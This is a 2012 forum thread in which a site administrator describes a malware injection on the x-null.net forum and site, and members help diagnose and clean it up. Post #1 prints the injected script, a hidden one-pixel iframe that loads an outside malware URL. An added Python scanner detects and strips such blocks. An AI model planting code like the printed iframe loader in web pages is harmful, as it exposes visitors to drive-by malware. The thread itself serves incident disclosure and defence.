Thread: Forum Down Time

  1. #1
    Administrator James's Avatar
    Join Date
    May 2010
    Location
    on the intraweb
    Posts
    3,180

    Forum Down Time

    Just to give a little bit of a status update with regards to the malware issue.
    I initially thought that the malware problem was a false positive, but it turned out that it indeed was a REAL problem. Somehow (still trying to find the culprit) the website had JavaScript code embedded on all the html pages and several php pages.
    I ended up having to do a clean install of the board, and I disabled the mods for the time being.
    I have found out that the pages have been injected on 12\10\12. I'm still trying to figure out how, but basically this is the syntax that was embedded:
    Code:
    <!--f524d6--><script type="text/javascript" language="javascript" > (function () { var vjh = document.createElement('iframe'); vjh.src = 'http://varmeteknik.se/wp-admin/count.php'; vjh.style.position = 'absolute'; vjh.style.border = '0'; vjh.style.height = '1px'; vjh.style.width = '1px'; vjh.style.left = '1px'; vjh.style.top = '1px'; if (!document.getElementById('vjh')) { document.write('<div id=\'vjh\'></div>'); document.getElementById('vjh').appendChild(vjh); }})();</script><!--/f524d6-->
    This could also be the reason why the home page jquery stuff is off, because I found it was embedded in there along with other pages. The cleaning process could be a tedious one, but I'm doing my best to get this all sorted out. I have a backup of everything just in case.
    Thanks for your patience everyone, and if anyone has any more info about this attack or anything that can help secure against it, please let me know.

  2. #2

    Hi James, any idea what the script does?

  3. #3

    Knowing how this happened may prove to be difficult. It would be nice to know if the attack came from the forums or the site... though, the site doesn't have any input, so how would it suffer an injection attack? Anyways, if there's anything I can do to help clean this up, let me know. I have experience doing this type of thing.

  4. #4
    Über Prodigy & Developer Razo[R]apiD's Avatar
    Join Date
    May 2010
    Location
    Poland, Lublin
    Posts
    3,257

    I think it could be done via IRC or Shoutbox, that's why I told James to turn them off for now.

  5. #5
    Administrator James

    I'm not sure how it happened. I think I cleaned it out, but it may take some time for the changes to propagate. I'm hoping that's the case and the site doesn't continue getting flagged. @own3mall, honestly, when I say inject, I meant literally they embedded that code I posted above into the php and html website. That included our home page x-null.net\moh as well as the forums. I'm also hosting other sites on this domain (my cousin's business) which is in no way affiliated with xnull, since they have their own domain, and their site also got injected with the code. I had to manually go into each php and html file, search for a part of the code above and delete any references to it. That's about the only information I have at this point. As far as the forums are concerned, I have backups made and I did a clean install and it's still getting flagged, which is why I'm hoping it just needs to propagate the changes. I will keep everyone posted on the status. I'm so sorry for the inconvenience!
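
The manual cleanup described in posts #1 and #5 (search every php and html file for the embedded code and delete it) can be scripted. This is an added example, not code from the thread: it finds and strips blocks wrapped in paired marker comments like `<!--f524d6-->` ... `<!--/f524d6-->` that build an iframe. The 6-hex-digit marker pattern, the function names and the sample page with its placeholder URL are assumptions.

```python
import os
import re

# Paired marker comments as in the post: <!--f524d6--> ... <!--/f524d6-->.
# Assumption: other copies use the same wrapper with some 6-hex-digit id.
MARKED = re.compile(r"<!--([0-9a-f]{6})-->(.*?)<!--/\1-->", re.DOTALL)
IFRAME = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)|<iframe\b", re.I)
SRC = re.compile(r"\.src\s*=\s*['\"]([^'\"]+)['\"]")

def find_injections(text):
    """Return (marker_id, [iframe src URLs]) for each marked block that builds an iframe."""
    hits = []
    for m in MARKED.finditer(text):
        if IFRAME.search(m.group(2)):
            hits.append((m.group(1), SRC.findall(m.group(2))))
    return hits

def strip_injections(text):
    """Remove marked iframe blocks; marked blocks without an iframe are left alone."""
    return MARKED.sub(lambda m: "" if IFRAME.search(m.group(2)) else m.group(0), text)

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root and report {path: hits} for every file with an injection."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_injections(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample page (placeholder URL, not the one from the thread).
SAMPLE = (
    "<html><body><h1>Home</h1>\n"
    "<!--a1b2c3--><script type=\"text/javascript\"> (function () { "
    "var f = document.createElement('iframe'); "
    "f.src = 'http://injected.example/count.php'; "
    "f.style.width = '1px'; })();</script><!--/a1b2c3-->\n"
    "<!--abcdef-->legit note<!--/abcdef-->\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    print(find_injections(SAMPLE))
    print(strip_injections(SAMPLE))
```

Run `scan_tree` against a copy of the web root first, and diff the output of `strip_injections` against a known-good backup before overwriting any file.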

  6. #6
    Client Beta Testers Appelpitje's Avatar
    Join Date
    Jan 2012
    Location
    Belgium
    Posts
    571

    Not sure if you know all the infected places on the site, but Sucuri SiteCheck gave this:

    Code:
    Security warning in the URL: 
    http://www.x-null.net/MOH/404testpage4525d2fdc
    
    Security warning in the URL: 
    http://www.x-null.net/MOH/404javascript.js
    
    Malware found in the URL: 
    http://www.x-null.net/wiki/

  7. #7


    Going by Chrome info -:
    Safe Browsing
    Diagnostic page for x-null.net

    What is the current listing status for x-null.net?
    Site is listed as suspicious - visiting this website may harm your computer.

    Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

    What happened when Google visited this site?
    Of the 9 pages we tested on the site over the past 90 days, 5 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-12-14, and the last time suspicious content was found on this site was on 2012-12-14.
    Malicious software includes 10 exploit(s).

    This site was hosted on 1 network(s) including AS26347 (DREAMHOST).

    Has this site acted as an intermediary resulting in further distribution of malware?
    Over the past 90 days, x-null.net did not appear to function as an intermediary for the infection of any sites.

    Has this site hosted malware?
    No, this site has not hosted malicious software over the past 90 days.

    How did this happen?
    In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

    Next steps:
    Return to the previous page.
    If you are the owner of this website, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Centre.


    That's dating back to the 14th, so not sure on the expire times for sites that were flagged and then now clean, but you should be able to force a review, James, on Google Webmaster as above to clear the flag.
    Last edited by heatsinkbod; December 16th, 2012 at 02:34 PM.

  8. #8

    I'm getting a warning from Firefox as well.

  9. #9

  10. #10
    Administrator James

    Thank you everyone, I have cleaned up all traces that I have found. I resubmitted a request for Google to recheck my site. On a side note, for those of you that added the site on a trusted site due to your virus scanner, if you removed it again, can you tell me if you still get warned on your end?
